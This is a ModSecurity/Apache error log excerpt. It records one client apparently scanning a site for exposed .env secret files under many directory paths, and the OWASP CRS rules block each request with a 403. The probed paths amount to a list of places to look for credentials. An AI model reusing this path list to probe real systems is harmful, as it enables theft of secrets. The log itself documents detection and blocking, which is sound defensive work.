[Tue Dec 02 08:38:22.125059 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPwAAAAk"]
[Tue Dec 02 08:38:22.125282 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPwAAAAk"]
[Tue Dec 02 08:38:22.156399 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQAAAAAk"]
[Tue Dec 02 08:38:22.156631 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQAAAAAk"]
[Tue Dec 02 08:38:22.156829 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQAAAAAk"]
[Tue Dec 02 08:38:22.188099 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQQAAAAk"]
[Tue Dec 02 08:38:22.188322 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQQAAAAk"]
[Tue Dec 02 08:38:22.188528 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQQAAAAk"]
[Tue Dec 02 08:38:22.219839 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQgAAAAk"]
[Tue Dec 02 08:38:22.220070 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQgAAAAk"]
[Tue Dec 02 08:38:22.220288 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQgAAAAk"]
[Tue Dec 02 08:38:22.251764 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQwAAAAk"]
[Tue Dec 02 08:38:22.251988 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQwAAAAk"]
[Tue Dec 02 08:38:22.252199 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjQwAAAAk"]
[Tue Dec 02 08:38:22.283276 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRAAAAAk"]
[Tue Dec 02 08:38:22.283499 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRAAAAAk"]
[Tue Dec 02 08:38:22.283727 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRAAAAAk"]
[Tue Dec 02 08:38:22.315074 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRQAAAAk"]
[Tue Dec 02 08:38:22.315380 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRQAAAAk"]
[Tue Dec 02 08:38:22.315606 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRQAAAAk"]
[Tue Dec 02 08:38:22.346701 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRgAAAAk"]
[Tue Dec 02 08:38:22.346938 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRgAAAAk"]
[Tue Dec 02 08:38:22.347154 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRgAAAAk"]
[Tue Dec 02 08:38:22.378225 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRwAAAAk"]
[Tue Dec 02 08:38:22.378494 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRwAAAAk"]
[Tue Dec 02 08:38:22.378704 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjRwAAAAk"]
[Tue Dec 02 08:38:22.409917 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSAAAAAk"]
[Tue Dec 02 08:38:22.410144 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSAAAAAk"]
[Tue Dec 02 08:38:22.410373 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSAAAAAk"]
[Tue Dec 02 08:38:22.441468 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSQAAAAk"]
[Tue Dec 02 08:38:22.441690 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSQAAAAk"]
[Tue Dec 02 08:38:22.441903 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSQAAAAk"]
[Tue Dec 02 08:38:22.473129 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSgAAAAk"]
[Tue Dec 02 08:38:22.473373 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSgAAAAk"]
[Tue Dec 02 08:38:22.473621 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSgAAAAk"]
[Tue Dec 02 08:38:22.504998 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/server/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSwAAAAk"]
[Tue Dec 02 08:38:22.505272 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/server/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSwAAAAk"]
[Tue Dec 02 08:38:22.505516 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/server/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjSwAAAAk"]
[Tue Dec 02 08:38:22.536489 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/client/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTAAAAAk"]
[Tue Dec 02 08:38:22.536795 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/client/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTAAAAAk"]
[Tue Dec 02 08:38:22.537019 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/client/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTAAAAAk"]
